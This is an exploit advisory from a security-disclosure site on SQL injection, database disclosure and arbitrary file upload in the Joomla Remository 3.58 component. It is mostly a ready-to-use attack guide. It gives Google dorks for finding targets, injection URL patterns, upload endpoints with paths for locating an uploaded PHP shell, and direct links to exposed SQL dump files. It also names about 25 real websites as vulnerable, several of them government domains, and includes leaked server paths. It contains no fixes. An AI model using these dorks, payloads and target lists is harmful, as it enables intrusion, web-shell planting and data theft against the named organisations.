Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Backdoor Access

2019.01.30
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:''/index.php?option=com_remository''

#################################################################### # Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 30/01/2019 # Vendor Homepage : remository.com # Software Download Link : remository.com/downloads/joomla-3.x-software/ # Software Information Link : extensions.joomla.org/extension/remository/ # Software Version : 3.58 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_remository'' inurl:''/administrator/components/com_remository/'' intext:Site Designed By Conservation Designs intext:CCCV Gabriel Valencia site:gob.ec intext:Web creada por softdream.es intext:Sponsored by Innovatron - Managed by Spirtech intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates intext:Web design by Mercury Web Solutions intext:Joomla 2.5 Templates Designed by Joomla Templates Free. intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V. # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200 [ Information Exposure ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** “Remository” is open source software for Joomla. #################################################################### # Impact : *********** *Attackers can exploit this issue via a browser. The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. * An attacker might be able inject and/or alter existing SQL statements which would influence the database exchange. * SQL injection vulnerability in the Joomla Remository Components 3.58 because, it fails to sufficiently sanitize user-supplied data before using it in an SQL query. * Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_remository&Itemid=[SQL Injection] /index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id= [ID-NUMBER]&orderby=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id= [ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id= [ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection] #################################################################### # Arbitrary File Upload Exploit : **************************** /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles /index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR] /index.php/shared-file-repository/func-addmanyfiles/ Directory File Path : ****************** Search your file here. /components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php /components/com_remository_files/...... Note : If websites are not vulnerable it says ; You have no permitted upload categories - please refer to the webmaster #################################################################### # Database Disclosure Exploit : *************************** /administrator/components/com_remository/assignment.sql /administrator/components/com_remository/blob.sql /administrator/components/com_remository/containers.sql /administrator/components/com_remository/file.sql /administrator/components/com_remository/log.sql /administrator/components/com_remository/permission.sql /administrator/components/com_remository/repository.sql /administrator/components/com_remository/reviews.sql /administrator/components/com_remository/structure.sql /administrator/components/com_remository/text.sql #################################################################### # Example Vulnerable Sites : ************************* [+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql [+] oceap.gov.ng/administrator/components/com_remository/remository.sql [+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category [+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category [+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category [+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27 [+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27 [+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27 [+] pymeschamartin.softdream.es/index.php?option=com_remository &Itemid=7&func=select&id=5&orderby=5&page=3%27 [+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func= download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27 [+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27 [+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27 [+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27 [+] concretedev.com/index.php?option=com_remository&Itemid=37%27 [+] lexcont.de/index.php?option=com_remository&Itemid=4%27 [+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile [+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52 [+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile [+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1 [+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625 [+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles [+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25 [+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en [+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018 #################################################################### # SQL Database Error : ********************* Strict Standards: Non-static method JLoader::import() should not be called statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29 Deprecated: Assigning the return value of new by reference is deprecated in /home/epangsof/public_html/includes/joomla.php on line 836 Warning: Cannot modify header information - headers already sent by (output started at /home/epangsof/public_html/includes/joomla.php:836) in /home/epangsof/public_html/includes/joomla.php on line 697 Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime() in /home4/hbman23/public_html/main /includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html /main/index.php(22): require_once() #1 {main} thrown in /home4/hbman23/public_html/main/includes/framework.php on line 21 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top